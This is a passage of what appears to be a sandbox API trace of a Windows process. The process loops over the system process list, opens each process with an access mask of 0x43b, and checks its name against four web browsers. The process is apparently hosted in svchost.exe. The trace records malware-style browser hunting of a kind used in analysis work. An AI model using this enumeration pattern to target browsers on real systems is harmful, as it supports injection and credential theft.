	[0230.389] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x67c0
	[0230.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.389] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.390] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.390] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.390] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.391] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.391] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.392] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x67c4
	[0230.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.392] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.393] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.393] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.393] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.393] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.394] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x67c8
	[0230.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.394] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.395] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.395] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.395] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.395] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0230.396] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x67cc
	[0230.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.396] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0230.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.397] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.397] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0230.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.399] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.399] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0230.400] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x67d0
	[0230.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.400] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.400] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.400] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.401] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.401] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.402] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x67d4
	[0230.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.402] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.402] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.402] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.403] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.403] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.404] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x67d8
	[0230.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.404] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.404] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.405] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.405] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.405] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0230.406] CloseHandle (hObject=0x4fd0) returned 1
	[0230.406] Sleep (dwMilliseconds=0x64) 
	[0230.506] GetCurrentProcessId () returned 0x110
	[0230.506] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0230.509] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0230.509] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0230.511] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0230.512] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x67dc
	[0230.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.512] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0230.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.512] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.513] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0230.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.513] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.513] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0230.515] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x67e0
	[0230.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.515] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0230.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.516] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.516] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0230.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.516] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.517] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0230.518] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x67e4
	[0230.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.518] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0230.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.519] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.519] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0230.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.520] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.520] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0230.521] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x67e8
	[0230.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.521] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0230.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.522] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.522] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0230.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.522] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.523] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0230.523] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x67ec
	[0230.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.523] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0230.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.524] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.524] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0230.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.525] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.525] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0230.525] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x67f0
	[0230.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.526] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0230.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.526] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.526] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0230.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.527] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.527] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0230.528] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x67f4
	[0230.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.528] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0230.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.528] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.528] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0230.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.529] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.529] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0230.530] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x67f8
	[0230.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.530] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0230.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.530] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.530] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0230.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.530] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.531] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.531] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x67fc
	[0230.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.531] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.532] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.532] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.532] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.533] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.533] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x6804
	[0230.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.533] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.534] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.534] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.535] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.535] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.536] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x6808
	[0230.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.536] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.536] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.537] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.537] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.537] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.539] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x680c
	[0230.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.539] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.539] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.539] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.540] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.540] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x6810
	[0230.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.541] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.541] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.541] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.542] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.542] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.543] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x6814
	[0230.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.543] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.543] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.543] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.544] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.544] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.545] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x6818
	[0230.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.545] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.545] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.545] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.546] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.546] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0230.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x681c
	[0230.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.547] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0230.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.547] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.547] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0230.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.548] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.548] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.549] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x6820
	[0230.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.549] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.549] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.550] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
